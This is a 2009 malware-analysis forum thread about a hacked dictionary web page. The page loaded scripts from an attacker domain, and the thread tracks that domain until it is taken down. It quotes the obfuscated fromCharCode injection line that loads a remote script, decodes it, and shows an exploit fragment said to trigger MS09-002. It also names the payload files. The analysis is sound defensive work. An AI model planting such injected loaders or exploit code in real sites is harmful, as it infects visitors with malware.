Author Topic: malicious site  (Read 17588 times)

0 Members and 1 Guest are viewing this topic.

June 02, 2009, 10:47:13 pm
Read 17588 times

Shawn Jefferson

  • Newbie

  • Offline
  • *

  • 8
Our symantec endpoint protection detected this site today, and had a preliminary look at it and it looks malicious:

http://www.yourdictionary.com/dictionary-articles/german-english-translation.html

loads scripts from www.rbseu.com 91.121.78.143 which then downloads or attempts from many other IPs.

Haven't looked at the files in too much depth from www.rbseu.com yet, but they are:

common.js
lastfunc.htm
m1.js
m2.js
subfunc.js (looks like it downloads a SWF file)

malware may have been removed from the download sites already?

PS. I've downloaded some of swf files that the subfunc.js downloads, but I'm having trouble decompiling them.  I've tried Flare and the HP SWFScan, but neither are working for me.  Any suggestions?

June 02, 2009, 11:18:26 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
One of the payloads is at /style.jpg

I'm running the rest of the code through Malzilla to decode it and find the second payload.

Two other scripts it's got;

/s1.js
/s2.js

/edit

VT results for style.jpg

http://www.virustotal.com/analisis/35d1f712765ee7ac8c1af03187823cf6350951be6605b7606894fcf9b6d3682f-1243985377
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 02, 2009, 11:39:15 pm
Reply #2

Shawn Jefferson

  • Newbie

  • Offline
  • *

  • 8
I plugged the m1 and m2 scripts into Malzilla and I think I got the shellcode out... and did a XOR search that found an XOR key of 0xBC.

This URL pops out:

thpt/:w/wwr.sbuec.mot/poj.gp
http://www.rbseu.com/top.jpg

Just verified the MD5's and it's the same file as style.jpg.

June 02, 2009, 11:47:12 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
According to Anubis and VT, top.jpg is the same as style.jpg;

http://anubis.iseclab.org/?action=result&task_id=1fa7eac4cc3407ab4f977479d9c585e86&format=html

/edit

hehe just noticed your mention of it's being the same as style.jpg .....

/edit 2

Sadly, the code I was asking Malzilla to decode, ended up crashing it (twas the mck wrapped code - definately some of the shell code, but couldn't get it to decode safely, and can't risk this machine). Wepawet couldn't deal with it either.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 03, 2009, 06:37:11 pm
Reply #4

Shawn Jefferson

  • Newbie

  • Offline
  • *

  • 8
Hi,

Where did you get the s1 and s2 scripts?  I didn't see them initially.  edit2: found these myself!

How is the site infected?  I didn't see anything on the source code of the page, and am not sure where else to look exactly! :)

edit: Found it!  So simple, and I overlooked it once already.  In the common.js script that loads from the yourdictionary.com site, there is this line:

Code: [Select]
document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));
Malzilla decodes this for me:

Code: [Select]
<SCRIPT LANGUAGE="Javascript" src="http://www.rbseu.com/common.js"></script>
Also, I'd like to decompile the SWF file, but had no luck with either Flare or SWFScan.  Are there other tools that may be able to do it?

It looks like the m1/m2 scripts are triggering the MS09-002 vulnerability.

for(var x=0;x<1000;x++)ruix1.push(document.createElement("i"+"mg"));


June 04, 2009, 08:16:47 am
Reply #5

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
You can use Wepawet to decode the SWF files online. There are a couple of offline tools to do it, but I can't for the life of me remember them atm :(
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 04, 2009, 03:42:15 pm
Reply #6

Shawn Jefferson

  • Newbie

  • Offline
  • *

  • 8
Hi,

I found Wepawet (you had mentioned it earlier) and uploaded a couple of the SWF files.  They download menu.jpg which is an executable, but with a different MD5 than the previous ones.

Thanks!
Shawn

June 04, 2009, 07:46:22 pm
Reply #7

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
No problem :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2009, 01:20:59 pm
Reply #8

redwolfe_98

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 21
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

June 05, 2009, 01:55:38 pm
Reply #9

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

I don't see any malicious content at rbseu.com.

All urls at this domain return
Code: [Select]
<h1>Bad Request (Invalid Hostname)</h1>
Ruining the bad guy's day

June 05, 2009, 02:15:05 pm
Reply #10

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Interesting .... seems it's been taken down .... (unusual for OVH to be so fast)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2009, 02:29:28 pm
Reply #11

redwolfe_98

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 21
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

I don't see any malicious content at rbseu.com.

All urls at this domain return
Code: [Select]
<h1>Bad Request (Invalid Hostname)</h1>

hey.. i put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink.. according to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com

June 05, 2009, 02:51:26 pm
Reply #12

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335

hey.. i put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink.. according to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com


It's resolving, but there is no content.
Ruining the bad guy's day